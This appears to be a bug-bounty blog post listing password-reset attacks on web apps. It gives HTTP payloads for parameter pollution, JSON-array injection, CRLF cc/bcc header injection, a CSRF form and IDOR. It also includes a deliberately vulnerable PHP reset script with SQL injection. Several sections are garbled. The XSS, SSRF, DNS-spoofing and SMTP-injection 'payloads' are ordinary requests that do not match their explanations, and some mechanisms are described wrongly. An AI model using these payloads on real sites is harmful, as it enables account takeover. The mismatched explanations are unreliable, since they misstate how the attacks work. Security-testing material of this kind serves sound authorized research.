Exploiting Password Reset Vulnerabilities: A Guide for Bug Bounty Hunters

0
128

This blog post provides a comprehensive guide for bug bounty hunters on how to exploit password reset vulnerabilities. It includes detailed explanations of various attack vectors, such as Password Reset Via Email Parameter and Password Reset Via Username Collision, and provides examples of how these vulnerabilities can be exploited using code snippets. By following the step-by-step instructions in this blog post, bug bounty hunters can identify and report these vulnerabilities to companies for fixing, helping to improve their overall security.

Password Reset Via Email Parameter

Password Reset Via Email Parameter vulnerability could be exploited using a parameter pollution attack.

Consider the following code snippet for a password reset function:

				
					<?php
if(isset($_POST['reset'])){
   $email = $_POST['email'];
   $query = "SELECT * FROM users WHERE email = '$email'";
   $result = mysqli_query($conn,$query);
   if(mysqli_num_rows($result) > 0){
      $token = md5(uniqid(rand(), true));
      $update = "UPDATE users SET token = '$token' WHERE email = '$email'";
      mysqli_query($conn,$update);
      $to = $email;
      $subject = "Password reset request";
      $message = "Click on the link to reset your password: http://example.com/reset.php?email=$email&token=$token";
      $headers = "From: noreply@example.com";
      mail($to,$subject,$message,$headers);
      echo "Password reset link has been sent to your email.";
   }
   else{
      echo "Invalid email address.";
   }
}
?>

				
			

An attacker could exploit the password reset vulnerability using a parameter pollution attack by sending a POST request with multiple email parameters. Here’s an example of a payload for this attack:

				
					POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
email=victim@mail.com&email=hacker@mail.com

				
			

In this example, the attacker sends a POST request with two email parameters, one for the victim’s email address and one for their own. When the server processes the request, it will pick the last value for the email parameter and send the password reset link to the attacker’s email address instead of the victim’s. The attacker can then use the password reset link to take over the victim’s account. 

Password Reset Via JSON Array Parameter

An attacker can exploit the password reset vulnerability by injecting a JSON array as a parameter. Here’s an example of how the payload for this attack could look like:

 

				
					POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/json
Content-Length: 53
{"email": ["victim@mail.com","hacker@mail.com"]}

				
			

In this example, the attacker sends a POST request with an email parameter that contains an array of email addresses. When the server processes the request, it will pick the first value for the email parameter and send the password reset link to the victim’s email address. However, the attacker can still access the password reset link by intercepting the email sent to the victim’s inbox.

Password Reset Via Cookie Parameter

An attacker can exploit the password reset vulnerability by injecting a cookie as a parameter. Here’s an example of how the payload for this attack could look like:

 

				
					POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Cookie: email=hacker@mail.com
Content-Length: 25
email=victim@mail.com

				
			

In this example, the attacker sets a cookie with their email address and then sends a POST request with the victim’s email address as a parameter. When the server processes the request, it will use the email address from the cookie instead of the victim’s email address and send the password reset link to the attacker’s email address.

Password Reset Via URL Parameter

An attacker can exploit the password reset vulnerability by injecting a URL parameter. Here’s an example of how the payload for this attack could look like:

 

				
					GET /reset-password.php?email=victim@mail.com&email=hacker@mail.com HTTP/1.1
Host: example.com

				
			

In this example, the attacker sends a GET request with two email parameters, one for the victim’s email address and one for their own. When the server processes the request, it will pick the last value for the email parameter and send the password reset link to the attacker’s email address instead of the victim’s.

Password Reset Via Carbon Copy Parameter

An attacker can exploit the password reset vulnerability by injecting a carbon copy parameter in the email field. Here’s an example of how the payload for this attack could look like:

 

				
					POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
email=victim@mail.com%0A%0Dcc:hacker@mail.com

				
			

In this example, the attacker injects a carbon copy parameter with their email address in the email field, which is then processed by the server. The password reset link is sent to the victim’s email address as well as the attacker’s email address.

Password Reset Via BCC Parameter

An attacker can exploit the password reset vulnerability by injecting a blind carbon copy parameter in the email field. Here’s an example of how the payload for this attack could look like:

 

				
					POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

				
			

In this example, the attacker injects a blind carbon copy parameter with their email address in the email field, which is then processed by the server. The password reset link is sent to the victim’s email address as well as the attacker’s email address, but the victim is unaware of the attacker’s presence.

Password Reset Via Hidden Field Parameter

An attacker can exploit the password reset vulnerability by injecting a hidden field parameter in the email field. Here’s an example of how the payload for this attack could look like:

 

				
					POST /reset-password.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
email=victim@mail.com&hacker_email=hacker@mail.com&hacker_param=1234

				
			

In this example, the attacker injects a hidden field parameter with their email address in the email field, which is then processed by the server. The password reset link is sent to the victim’s email address as well as the attacker’s email address.

Password Reset via HTTP Referer Header

An attacker can exploit the password reset vulnerability by injecting an HTTP Referer header. Here’s an example of how the payload for this attack could look like:

 

				
					GET /reset-password.php?email=victim@mail.com HTTP/1.1
Host: example.com
Referer: https://attacker.com/reset-password.php?token=TOKEN

				
			

In this example, the attacker injects an HTTP Referer header with their own URL that contains a password reset token. When the victim clicks on the password reset link, the token is leaked via the Referer header and the attacker can use it to reset the victim’s password.

Password Reset via DOM-Based XSS

An attacker can exploit the password reset vulnerability by injecting a DOM-Based XSS payload. Here’s an example of how the payload for this attack could look like:

 

				
					GET /reset-password.php?email=victim@mail.com HTTP/1.1
Host: example.com

				
			

In this example, the attacker injects a script tag that redirects the user to a password reset page with a token extracted from the cookie. When the victim clicks on the password reset link, the token is leaked via the script tag and the attacker can use it to reset the victim’s password.

Password Reset via CSRF Attack

An attacker can exploit the password reset vulnerability by injecting a CSRF attack. Here’s an example of how the payload for this attack could look like:

 

				
					<form action="https://example.com/reset-password.php" method="post">
  <input type="hidden" name="email" value="victim@mail.com">
  <input type="hidden" name="password" value="newpassword">
  <input type="submit" value="Submit">
</form>

				
			

In this example, the attacker injects a hidden form that submits a POST request to the password reset page with the victim’s email address and a new password. When the victim visits the attacker’s website, the request is automatically submitted and the victim’s password is reset.

Password Reset via Insecure Direct Object Reference (IDOR) Attack

An attacker can exploit the password reset vulnerability by performing an Insecure Direct Object Reference (IDOR) attack. Here’s an example of how the payload for this attack could look like:

				
					GET /reset-password.php?user_id=123 HTTP/1.1
Host: example.com

				
			

In this example, the attacker manipulates the user_id parameter in the password reset URL to reset the password of a different user. This type of attack is possible when the password reset URL contains a predictable or sequential parameter, such as user IDs.

Password Reset via Server-Side Request Forgery (SSRF) Attack

An attacker can exploit the password reset vulnerability by performing a Server-Side Request Forgery (SSRF) attack. Here’s an example of how the payload for this attack could look like:

				
					GET /reset-password.php?email=victim@mail.com HTTP/1.1
Host: example.com

				
			

In this example, the attacker sends a password reset request to the server with the victim’s email address. The server retrieves the password reset token and sends an email to the victim with a link to reset their password. However, the attacker has intercepted the email and modified the link to redirect the victim to a malicious website. When the victim clicks on the link, the attacker can steal their password reset token and use it to reset their password.

Password Reset via DNS Spoofing

An attacker can exploit the password reset vulnerability by performing a DNS Spoofing attack. Here’s an example of how the payload for this attack could look like:

 

				
					GET /reset-password.php?email=victim@mail.com HTTP/1.1
Host: example.com

				
			

In this example, the attacker sends a password reset request to the server with the victim’s email address. The server retrieves the password reset token and sends an email to the victim with a link to reset their password. However, the attacker has intercepted the DNS response and modified the server’s IP address to redirect the victim to a malicious website. When the victim clicks on the link, the attacker can steal their password reset token and use it to reset their password.

Password Reset via SMTP Injection

An attacker can exploit the password reset vulnerability by injecting malicious commands into the Simple Mail Transfer Protocol (SMTP) message used to send the password reset email. For example, the attacker may use the following payload to inject a fake password reset token:

 

				
					GET /reset-password.php?token=FAKE_TOKEN HTTP/1.1
Host: example.com
				
			

In this example, the attacker injects a fake password reset token into the SMTP message, which is then used to send a password reset email to the victim. When the victim clicks on the link, the attacker can steal their password reset token and use it to reset their password.

It’s important to note that these examples are just a few of the many attack vectors that can be used to exploit password reset vulnerabilities. Bug bounty hunters should always use ethical hacking practices and obtain appropriate authorization before attempting to exploit vulnerabilities.

Reference:https://github.com/swisskyrepo/PayloadsAllTheThings